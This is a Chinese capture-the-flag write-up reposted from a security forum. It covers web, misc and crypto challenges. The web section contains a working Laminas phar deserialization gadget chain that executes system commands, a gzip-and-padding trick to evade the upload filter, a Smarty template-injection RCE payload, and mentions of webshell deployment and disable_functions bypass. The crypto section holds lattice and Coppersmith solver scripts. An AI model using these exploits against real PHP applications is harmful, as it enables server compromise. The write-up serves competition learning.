红明谷CTF
0x01 Web
Fan website
phar反序列化,现成的链子:
namespace Laminas\View\Resolver{
class TemplateMapResolver{
protected $map = ["setBody"=>"system"];
}
}
namespace Laminas\View\Renderer{
class PhpRenderer{
private $__helpers;
function __construct(){
$this->__helpers = new \Laminas\View\Resolver\TemplateMapResolver();
}
}
}
namespace Laminas\Log\Writer{
abstract class AbstractWriter{}
class Mail extends AbstractWriter{
protected $eventsToMail = ["cat /flag"];
protected $subjectPrependText = null;
protected $mail;
function __construct(){
$this->mail = new \Laminas\View\Renderer\PhpRenderer();
}
}
}
namespace Laminas\Log{
class Logger{
protected $writers;
function __construct(){
$this->writers = [new \Laminas\Log\Writer\Mail()];
}
}
}
namespace{
$a = new \Laminas\Log\Logger();
@unlink("phar.phar");
$phar=new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub('GIF89a'." __HALT_COMPILER();?>");
$phar->setMetadata($a);
$phar->addFromString("test.txt",str_repeat("aaaaaVVVVVAAAVASACSACSAaa",1000000));
$phar->stopBuffering();
}
看触发点和上传点,在www/module/Album/src/Controller/AlbumController.php:
public function imgdeleteAction()
{
$request = $this->getRequest();
if(isset($request->getPost()\['imgpath'\])){
$imgpath = $request->getPost()\['imgpath'\];
$base = substr($imgpath,-4,4);
if(in\_array($base,$this->white\_list)){ //白名单
@unlink($imgpath);
}else{
echo 'Only Img File Can Be Deleted!';
}
}
}
public function imguploadAction()
{
$form = new UploadForm('upload-form');
$request = $this->getRequest();
if ($request->isPost()) {
// Make certain to merge the $\_FILES info!
$post = array\_merge\_recursive(
$request->getPost()->toArray(),
$request->getFiles()->toArray()
);
$form->setData($post);
if ($form->isValid()) {
$data = $form->getData();
$base = substr($data\["image-file"\]\["name"\],-4,4);
if(in\_array($base,$this->white\_list)){ //白名单限制
$cont = file\_get\_contents($data\["image-file"\]\["tmp\_name"\]);
if (preg\_match("/<\\?|php|HALT\\\_COMPILER/i", $cont )) {
die("Not This");
}
if($data\["image-file"\]\["size"\]<3000){
die("The picture size must be more than 3kb");
}
$img\_path = realpath(getcwd()).'/public/img/'.md5($data\["image-file"\]\["name"\]).$base;
echo $img\_path;
$form->saveImg($data\["image-file"\]\["tmp\_name"\],$img\_path);
}else{
echo 'Only Img Can Be Uploaded!';
}
// Form is valid, save the form!
//return $this->redirect()->toRoute('upload-form/success');
}
}
正则过滤直接用gzip压缩一下就能规避关键词了,有大小限制加上垃圾数据
删除的地方有 unlink 可以直接触发:
phar://public/img/203bf1e6588e577c791940b9f684a7e5.jpg
Smart_calculator
www.zip 源码泄露,cookie里先添加一个login字段随便给一个值就能登陆。
然后直接看smarty文件的修改日期,找到近期被修改的文件,拉下原文件对比差异:
绕一下,然后代码注入就可以RCE了:
data={function name='(){};pHpinfo();function yeee()\{\%0a/\*'}\*///{/function}
可以直接写个Shell进去,没办法直接执行命令,发现有disable_function,蚁剑直接bypass:
0x02 Misc
签到
题出得很好,我就是鱼
MissingFile
直接strings memory > 1导出字符串,搜flag就能找到
0x03 Crypto
easy_ya
from Crypto.Util.number import \*
r = 7996728164495259362822258548434922741290100998149465194487628664864256950051236186227986990712837371289585870678059397413537714250530572338774305952904473
M = 4159518144549137412048572485195536187606187833861349516326031843059872501654790226936115271091120509781872925030241137272462161485445491493686121954785558
n = 131552964273731742744001439326470035414270864348139594004117959631286500198956302913377947920677525319260242121507196043323292374736595943942956194902814842206268870941485429339132421676367167621812260482624743821671183297023718573293452354284932348802548838847981916748951828826237112194142035380559020560287
e = 3
c = 46794664006708417132147941918719938365671485176293172014575392203162005813544444720181151046818648417346292288656741056411780813044749520725718927535262618317679844671500204720286218754536643881483749892207516758305694529993542296670281548111692443639662220578293714396224325591697834572209746048616144307282
P.<x> = PolynomialRing(Zmod(n))
f = (M + x \* r) ^ 3 - c
f = f.monic()
a = (f.small\_roots(X = 2\*\*128,beta = 0.4,epsilon = 0.02))\[0\]
print(long\_to\_bytes(M + int(a) \* r))
//b'flag{53a2e494-964d-4506-a2c4-c34b9475dedd}W\\xf1X6\\xacP\\x9bc~9\\xfd\\x0f\\x96\\xbf\\x92\\xb9+\\xe5\\xebPJ\\x17\\xc4\\xb2\\xe8\\xad\\x01\\n\\xf2j\\xae\\x15'
sm2
根据tsm2的sign和100组签名构造 HNP 格子规约出来就可以了
(s+r)(d+1)-r%n = k k 小
from email.mime import base
from sage.all import \*
from Crypto.Cipher import AES
from Crypto.Util.number import \*
from hashlib import \*
import base64
sigs = \['0299f768be70f857f72b2f51ff1ea9c6a4150fc327d833f309cc4785e24e02e3da6eb00040d332a485055d5e4e1f100f11b5af7193fa0f563558198234493961', '56d69878a81b614df64df2dcba2ebafbedab1bbda6fc08fd284c513caff0d8c212989c49412bd07c45d28fa08f5d18db620ccb92a044c67dc0791b3b011674cb', '30d04db3ad528f895fb6693a5e04485cf66ebe05cc52af8816716540f19b72f2a2197e783c620a385a16cb8997721499cc4aa768616ca15d2db0f9fca8fd4cdb', '8da002a89caf9202d049992908261b71711b0961755374f3e0e7ce75808804e1f5c2e6cc16e98717af044a07094e48c4f99ddc3fbd980e5dce5bd383cab5933a', 'eb4ad94b8473ebe0f574ca9fd15a9e58feb26fc7b9a009c4659f018506e4c008f1ddb3a18fae3edbc7764e2f9fce69bac710aceff99b23d5d438242d36be9d69', '309bc1d88c74fffada98cc9894686d128498c2442d19d884a2567377aa3cd48fe3d965e3c8aa08b8b76ffd0e767b4c0021616df8dc841558b1a5a0c70bccbead', 'bff192d180050f161d739e73d5cb8885a5e2f14a218242d7fe7c1ac41ab6cb2a0b3beb1382280a08485657b1a0f739e87dad40173f7e2540049cbf1ec0a447e7', 'ab5b182c463193088e05d93d434b6bc85520b786c6d6d1bcb5e64d456611f94beb7851d9b8c9b0ef90c3b998e1513c6300a02e0116eb494bc08afb47a20f452d', '1dabd46bd2d6140d44a30755e704874c680d7c0dcfec873f552ae59e7507e287c5f78dd3a3c06a4cecd793dac7308943d4c8a7c67bcad9b3413429ccbab194d2', 'f963717351045558d74a1a9412a4077216472fd4e8bc9a9ca58bef7d04bdb242e7c01c322250482a2389a2e78b26d0576c1268a5d8075b2a64948629e40a8b4b', '7b5a09b1e6c56b045833bf29d270c4a9bf4b1bfc247bffb2a61593f42d041166c5a930a8859aa4d1974df71eac43b4901bd7850965620fbce4cfc14990e9ec3d', '9633edc09d43d120c14afda218ecc55c8dfe1ba300811179d64b18f8b42eb8864a31252329c2cc3b19a4c0aa617fc14904c10c0f8ec5733c5d495ccf337e00d3', 'f2cfe285bbff01789cd891c3aca036af4fb54fb9a65e76184c6cf5543772725b6c7d7db615457662da09136d8318028f2cb5b47296390d3c4381f9e9f75fb05c', 'cf6780d28db3611cbc7aa9f161f2a709fbbd29983be59ccb97631549ac2a929fe4924a4cd923c2e48db95d7bc4fac45bf537d6f13b3d8348f7b94ecc11c03854', '50323cfc4beda4f2542c9e509bb043ecc6aa8a898915db8e907843bb56a080d8a52929340fb56b5de43f956dd1173120b88c5c8718297d7d633469c5dc0f8ed9', 'b143d8f36fc56cfb0467dd54af9ce8bffdac3bb5b8aa1df7290a7f4ff632f834fb38917b1f02a82f50a9e7663ba8ec26357fded3ea7870bb463ac219b7a04cf9', '8a5450ca4d771dd63e974de33fcaedad6e53f94fb92d251dfba62c7121d27d6294d986325880d46cee0250a4a56558bb2fd7aa619bb0309b4c65b3cf11f6d4aa', '3ae81196d24fc740348dba4e03a5bc45a75d9fe41f52160870631b0ab3a71f9c63aa4cc247e2f285cf4803c564413283694fc3a75a673aa4f54374f1460e7421', 'a409b15c00793d88435bc31f538d318b69f66bb029c13a5ce298ede2db788cfa5dc39473f13417bdde338e509e85781cdfe54168d26a03fb35438b917506c24c', '0d12d48fdbce87d9584c1355f9fc3610db77e8df7514bd80479fa12fc960da39865d745ec49e266ac0ac3a7ce330c7cf406c9d124feefd8cc927e68f64155a0f', '3dd63eb496f64e61ca687c3daf437bc31f0b563b51bd4eded71d6eeb56d25089c4e2b09250984271d7a69540c4b39d70127ea38e3c126c35baa94aae92281a08', '38c9571625b7da8aaef69e21a1d225082e4772a0cf5d3c23f3e783c529adef1469588302e91a8c44511f037b5b3aeffa60dab7ff1b5900ec35431a9f846baa74', 'a8b7adda8626a880394b7c47142558ff113c8d7f7c69dfc562a5ad7a3ffd6692f2d7a4f4ef19404c5a4a1f80817a2f7fd0e6fa277418610ef2d2d6b97346b2e7', 'a86a30d05909d45683c0745102c095459582d8273e7f69d0f42b11511ec53a498ce6a5572698efaf632f4da2435b512ae97908d00052194f89ed1921c5a5e9da', '1c3371ed8aa9f914f71276eee3fd25cbd87780a68ef724ed28842bc83e0d02ef5867c3264563197c27bb1e5ec2ffd634e32b720c4f6d5725300350b8d5cca2d5', 'f064b874158ff296e07f75def08c63884fcca93fa2bc018c607736614bcab3e2f692d9b52ed106b8abf68eb564ba999c5fa094967f10630014f2c583e4db107b', 'e5e37d9857e638cc41af7bf75280108b2f86f64617e21057e246102262b0eebb20307f7f359375761bbd366b7e9c1c9914623f200098e713730b6160d09bd0cb', 'bc18436538ab7bcf1789fcbe58f860c5ee9c779a6ea465531febb6f50b57e71b74d2ea9e664739225c0979e8ff77f189c50f5872f5c5a4c042d21b49f3e995f1', 'b45968deda83d9f42a255d627b53a01c5e665b39d67d7516f4a7ad703be810df3fae0374a1ef30f1da8ac87e5b86694882c1cd14cf69dd56b3689b84160aeb5a', '7aa8380c566d543582b462355dc82deb8812d01513f0c4d779af11bf06b003cad9a0e79316b6fe587cc45d47b1c43ed8924b6e397a4294ec6f8aef3d93403dab', 'e8e27863fbf8bee56c1c6338646445d6167c0dfde67c8f3d9f6fb47a8aebbb5766e7c6357b9ff5a2ea60e66ec87fe39750d19e4479cfce3f6826ff3a0a9cd570', '1e811334bf425f4b43d4a7a72923cda3b0de937bffb79e28b77bf01a3ae71195015144ab4579ba35486d83bb7412da260710349c7219403c66666dedac3c0583', '128433bb842d8cafba6e3d5c46eb3a220100f402da2298198d842742afebad7829cbe85629d3d833581aaa60e8c9431316eab3dd0ed541a766b96ce37b30bc2a', '0b48699327e0aa9918c11eefe095e739468f363e7c5476d0d12d84de8321deeaed2c0fd2e106925b8848935e91ab23e12b70c09239376122e0d36b84b455b2fd', '7ef2e62c79c62cc8ea9389f624c614c7b5a0086b50e7e0fdec5130567af4793ef785bde90fbc6e54f6b5e5ead5c77d05d4c96eaf828a0829412c653257ac6229', '468e2aa659e9b35b97d5bac24f417bab88ffd9a4242cc8692206ac316bed0faca9de2eab82571ff2914afae01212d96215bf2227040385b289fb9ebd140b06da', '4b81db768fc5e8c120ead0153430d75c45df0393f933bf71da457c4c6755ec69e3d0f99e216cf2afc216436877bd1f148d952adb41b28f610579ce5503b17549', '58e9e0f30175ef2b88ea4ee9053a440bbcb7e3d16d94ace741fa719c3815bf176f2ce06e7f6e10f54efac521bfec84af91b4ca1b04c1dcb8e7d03e32ea38596a', '45e85224c9e50d36cf1b9062bf13a7764b11b73b8ae717f246d66c85ca4f0c31088b37a04f83ec3763d3fbb466acdc6ea683f36e9073fdbb22cf319dd58e9024', '927fa98f6a9e9de8173235bed1ff048eeacbe9b3e46bc8885435283d1c61e2a074703f4e8dd1191f5dedc2089738f2af1c89936e44d72ababa7c3a4f9359cd43', '2afe144b238287f4adce58daa21311cd0f0ae26487db8e256678606ab4e4e400a25ce747bb7c416e7eb7f5a97c280da450a69fe32a246846176f4d910de748ba', '6759b6a2cf566d1ebc2748dd318222722c00b2fba287cbb6e1da7d356d65c3d31fa0d9757dcdc1953b515fd6e190ba16180666506b6bf3a438ddc75815a86e57', 'd539f75eb9f7d30dac3987cc959e5c169b33b027f021e29479c8167d982ef36a7557fcf54cf31e6108f2c9df9d507eea90ff4fc49239e80b47c7d7605d6e5534', '25da3affe6289855a864ed7811e147f4bc8520a1f3c62791b0f3059265e9d2bb184522fa7411c532a68febfaaa50cb100b264abb349eec7302849f52cb265e09', '4fcb0ad6726e9035f5cc5c45d5a8830e09e493661f58a520dc2bba46f65052757037b356c410f26289293c7071b4b775fa12b1f2fae0ead76d8ca02123b3808f', '64acde0ca5323a8a259d012b44dc423592573f9401d4648434447103c49a267b73f3a3947decc7d236265bb4391ec4bd94e425d8d5041ce563cebf044b67ba38', 'd725c7c0a04b674beb0b089aa3bc7c97c2044e6304254795c7c61b07c55eaeb7eb6d737047e2b45ae4cd96843448aebeb194c4e834b3c9664fca726be0c5d890', 'bf6210ced2953b98f9b82f58c84f37a4206aedb2a85f52f9ce019b64d8425e63f60e09dbda36a0160fd9d35bbaffa8de04b15e1aea243603068de034ed9d2ea3', 'c9e4647355c337b78edaa909c95c1d619a121afc7c34ec7557a5b09d6b182430db152568b256c7315578bab5cde92278a378f0de495ff857078aabbee3ab3690', 'a869f86697738e6bbdd0748f6bf701d489a32719f89adb4cc7996fc4bb540fd3e1a4e5af001ca81e76a1cea03113778f9f16c3627b8185a2db6c6ffca8a177f4', '29076654d718d92d0a52942c18ca5b9f6891dc1cde7f12fed60ac9d67c5ed1689a9696f6db786f89e9b7a0499f97574365035ee37f8b7d444a2460f7774f00dd', '85c902a3c3e39e6e233ba1699b472b70489a44564cb5987893afdf956350be736d3b0478c5df62e9e0f6397d361ca1ae04d5e3b8557f7ca0c1d1ad3c82b973f4', '826f5436ab916daa63990daa4153aa848ccf90230eecd8b86a1de836656685752e39f8b41561bb07c39c9e40056e92dbb474ef432bf0f1617a460a7a90c51dee', 'd4dba42e273affc76b7d1fff4f91cc37b7a23869bd75583cdb70a3ffdc5c58bcc71c32f591721b59e2358542af0be90f8137e4cbbc042e25b76e7f1380a65812', 'c4edd8ab085d0ee366856a48cb83b09dfada84e99b2d9b2a4f909986bc78cf4abd63e2ae893e0535362b27475f292ece70a6c070bc6a927cd924ad013b311caa', '44c51530b472a040413e18ce80239a240fe3c312c7625b98cbbe74f3aafa1c60f1489b689478b79dw54c815f8cec382e796b7344cd8f3628ae7b776231cf4f5384', '23c81e80ce0350f7b95075f03d2381a1aea6d13cddf111ea8110891e2e7086ecc69f43e66393b62ed5ee2ad6e74bf0c91239c5bad6044cea2812002ef0b876ea', '4ca1353f26ad12589100ebc5d44801816741a77ebfb19e0f2b9be97407f7ae10e192bb6b9d34914a637cd1fa5c49b362bfeaab697d758e5de3d7e0637c973727', '44bd1dd24b438b95d4085ceba4203b74ecbf0baa6008bce817f4399c3e3d733d7a087ed26a85504cb75adc2656a5822779be0806be2032a56f2ae3cfee9e4aa1', '608737b1aa1574a61351c972b4599a598190e1ef0282330c667805a8587707cc0b26903360472e19b53a60925e67249bc87dc0b907b51a5213685455bc8c3df4', '08e0e133ffbc775f9a8b08e7409fbf9e5fa83dfc0adbefb8408f28f043e6c57dc8128cd0d159f27d24631b3df54f0ed26c177ab908cdeb081fb0503a3bf76a62', 'fa55166ae9de2a6ca9c1cc66097821fa3d277956196c540f6e64aa4d75f887d9610521dcdfd2a2a579edf720353feec8067848a62edcb71d262724175d04929f', '896941de4316b1a784a8519ee4c31fdb63602aa529a1285cf81429c87c79d4d8828c5971194f884db7d675f4f64d42dfbe6c8b8f273e980122757d4ee09e91e9', '8c1d5b553d6457648c5fb390e10f402492336bf1752ab89ea67dc8d20840b0a8f6db5d8fbb18a6e8a56e62b220888720975df86c270c879708923c0ce5fc6fee', '264a9ad4f673b591e24d127be855934b3cc35bce89dbc53e2f068418b0a941b59d62d406ff816c182795f98a1d5f62fb160c7d03eea09a36ce615fae3c898050', 'ad5012241bbf11ec772ad0d00b77b2ed9f6789cf8a67ff3575e5226b0b1c6c6d097e5fa05fd48ab40659b2712c1f721cc80b206d10d6c56a8f0f1281db254552', '42fd2268e0a01f33768f55d10b11410641648a1e627e43d1e7ac5e066446a2f07c5ff22ba0749f150f41dd01cc90230f6fd3bd3e205a826702f68db1f530dadf', '67115049d6fb02b7399e73296d0533865b36adfc481a1e420d4ed384ceda596751bbea39709edcf9718489bab95faa1a21e89c00311d4d5a0d7bc84f514f26ed', 'f341ba3ec6df033dcaf0d3a8778ccbdce9408426fce2e97dfef529514f4f331caf384fb0828c3bd39aa1e379a8af3e39d838b350b7d8605751f34ca4024409f8', 'fa4c46c9a107ac1346ffa3cb8b30a9162bce792665d674400f4383c5f683fb062e3b13afe1382bd655308f1514db83e3e369cdfff72338b97493abebabbfb719', '9101346e190dd0e8f3fff68e9023f55aa657d71710e80380ebfb3bf4a093d3ef44f3097e5983049304b1048233e9b399fe512d2856893ee201ddd030ea8e06a8', '4e9c6150d09367c92a617477cfe98818d39db8e5f32311e9c67d17a5a02c20d1c4d884f98f60aa6be3bdf4dbd6b48dde755cc2098744f79fa5484ecf5520ae7f', '8642c3bc162ac445c8fd7bed403bfe0dd657dbfcb7f979b57580ab96159ce6ff612fa51e08481d89da782e981eedcbfb2522ccfff245726544330194c07a1717', '346afb577fcd8eaee4202ddeb8d7e73610e7c2cfc57e9c6626f61e05eb4361d02939c581f119345ca38710a6535fd12bd0384fec6b3764e760e9a6736660ec6f', '074da8a90f3db7e72072e8c16cbbf43c4231e603fe0a7503891cec6f7aa29b2238bca9008075959297ff406337e3d30c7188f44ab04490bad127979a7b98b088', '3ebac333cfa50b6ed33eeb5f37b46b5e31e2fd4af8ef11de3c9a72370e6abe18feefde25d20942578ccbab553f8fb16d190a5d28b729459b3382c172ebc18ba6', 'd05f26a96fd7f9f1091b460a9a55689263ad3256e0be781e9bd7a99050c16fe3707a7feb7f05331fd013757c63a792ea55374a992e447aa96a9f73428c60be1c', 'b714a57d0ebad5fa792b4a0c83af943b690157fe0780b068e1520bd72025bd1eb62d7852ec937394ea335cd83341481d7522f50b663777ae69786ae29c622c6a', '91f7a98cbad99f6e91014cae50076cab5b8c6a5c58c5858bf2d91102501b43ff31dc73e7723964972371c009bd72f2a795f74a8cb6ae9c50e8970631d0cd2a93', 'fd38b957099419344feb7e371b0aeff55a09ef99fedc17fc41a4ea85e755a5883c947a881d02c29c91e101b3420ab6c81a6ea171984245a142b1d92bf540a8c7', '02d8390a6f7045650dda88d41b0fe79c9b864da60b0df5973d1282a8b6f82a56afce5c44d94bf192b2358f9954e09ac7523c2f65a70249b2e7a7cc02da700f8e', 'a78e05af0126a939666c36a627efae721eee96be180b3794dcd60e4bceb41fa89f2d10dcdbef9382a90cd4383870d360aa3a71da027dd86ecdad5724a094c9e4', 'f020f03ba9f2cf28206223bc62421d72b7fe3c9e81e6b65aba7d760fc517d9bde64a82be98cd6ae48f13fd504008bdcc464a588c97ee17dfd783602ca69fd351', '6001f080a74f916581324eea8809b16b82b65ec6836f8c01238a365d0f640e461d6acf2288dd05c9e5bf6e49edd2ffb52edef2f6018dfea19ab9c8b3f12a06ca', '29894e9432aeb736623a2d753dfe76f89310b301c5ea4e33e0ab2e706ff3daa51c955137299428af402ebbd3e6fc21105234616fefec9703e910686e33eceea4', 'bbc9bbe8f52c4e369cf314019054363186e7ca2f3912b926ff28f00dfb15a95c70fb8a88d82da465f657381056cbef51922eb956804042d5f8709d4cc8e244c6', '88f2adfbdc29c83694619a42fb23e9ed172c48bac2c72f0c966172ff4906ecdac482b11f8757536c64382ce5f210bdc3d49c84bf44348fea50ce3d710a7d9383', '65c544b2d7d7d28ae51611e96c9515cdc11bd4f00d4d96e0273c45af09ad925e7e3a01e5036d1533b59db1ceac1f145ccbe8fcd43c1e027f6aca957e67de0274', 'abd41a53271f5c4c8356a97489a0f4418877d67937f2fdb829b4b71eaf64c72db3a821bb91f270d3e01d2da112d12c9ca3c6d2964635f18d989dfaf6bf8fdeb7', 'c2d11c45906c48e254665d0693d843134c5365e134ba487c8ef3da0584ca566f537092c89993ad4071d3fe17d75a513f95d8be218ccf41226ce0fac1cf3947ac', '05488f64fb8bd8b2b3bcfb99925525aafbae1b1262d3ecc1f4176761b137ee3bbc9769f28a6d13a3181291083fa3b39c0702db5679837be353472301a1f5e318', '95792f73d843ff4ccc62c53da8c58db48f56e22c0f38aa0ac4b0275e3a305a3a812425efd2d6203aa4a35c7732e4712c46ff5d38c933eab5ce286cee4b85538b', 'b39b004b6c12c0635e51487926623f18f0f5c52eaa81df6a8e3b64398ce020ae49c097b164c734aa851c1e4ca1dbaf1e23947dfdae1257522243e720951e8862', '6891720082ff1885fc095767a2114a2322f326ce48af92453ea76d57c99c2aad7d0dcbd9cb80d36007913209d14051947b026acfbeb7ea8078df4f9a576fbfc9', '93351dad07711cf9501e6e565025a6414da57f52260a3fb1f30aa3bbd1d9318b063305c203c68f93b2a6555b574c02a836ced1b5acc765d8047c033446e19616', '9ea4e43207d9f5a10c32608e782687d177107699cf9dfc9faedba09a477c3f6b8bc1677a0b17c70f94c3f9f8a857aa63cfaccb4a2c0ddd9373de7ac0eef6966f', 'b51db0b7a06dd6b1721a0362b89d6ede3613bf03f7bf4efa5444cfe7fec06c7cbc2e848f53eff793785594d302564551d751c70f033b3f9cabd7f795b205f3a5', 'f551370d4659c0f85253c345a8a80ea3e98e41dc61fd5ee9a77982c2586ce5847d76aebff3e0a63c5b5ac9376baf65abbb15f0f5d33b6b0e02ca9fdb2f1d5fcf', '324b9f33d41c2fae485c0150e695832ed4f885f5df8d0beff39a982fb9198175cc3211d06f46f9fed0a39338c9cec971b1f7d0568008823f3ac0b588ec8f17ce', '6d27e580c4f673b24ec4ffe12d8f6c4e15897bdba0628627930b267aa0da0f66e2ae143ae1eef11e246c85b15d0c17b06df77ab9b13ea812514175779721c915'\]
n = 0xFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFF7203DF6B21C6052B53BBF40939D54123
R = \[int(sigs\[i\]\[:64\],16) for i in range(len(sigs))\]
S = \[int(sigs\[i\]\[64:\],16) for i in range(len(sigs))\]
A = \[R\[i\]+S\[i\] for i in range(len(R))\]
B = \[-R\[i\] for i in range(len(S))\]
M = \[\]
for i in range(len(sigs)):
tmp = \[0 for j in range(len(sigs) + 2)\]
tmp\[i\] = n
M.append(tmp)
A = A + \[1,0\]
B = B + \[0 , 1<<250\]
M.append(A)
M.append(B)
M = matrix(M)
c = base64.b64decode(b't9KiSxyVZ3Gc+1e/O/8bBGFZ/yXApWyTj0cI6npbfJ+bKPZf7xvISm35RvfNCn7hSeW4dS27Wnp2zUpDqR2uZA==')
L = M.BKZ()
for a in L:
if a\[-1\] == -(1<<250):
d = -a\[-2\] - 1
key = sha256(long\_to\_bytes(int(d))).digest()
aes = AES.new(key , AES.MODE\_ECB)
m = (aes.decrypt(c))
if b'flag' in m:
print(m)
elif a\[-1\] == (1<<250):
d = a\[-2\] - 1
key = sha256(long\_to\_bytes(int(d))).digest()
aes = AES.new(key , AES.MODE\_ECB)
m = (aes.decrypt(c))
if b'flag' in m:
print(m)
- 本文作者: 局内人
- 本文来源: 奇安信攻防社区
- 原文链接: https://forum.butian.net/share/1427
- 版权声明: 除特别声明外,本文各项权利归原文作者和发表平台所有。转载请注明出处!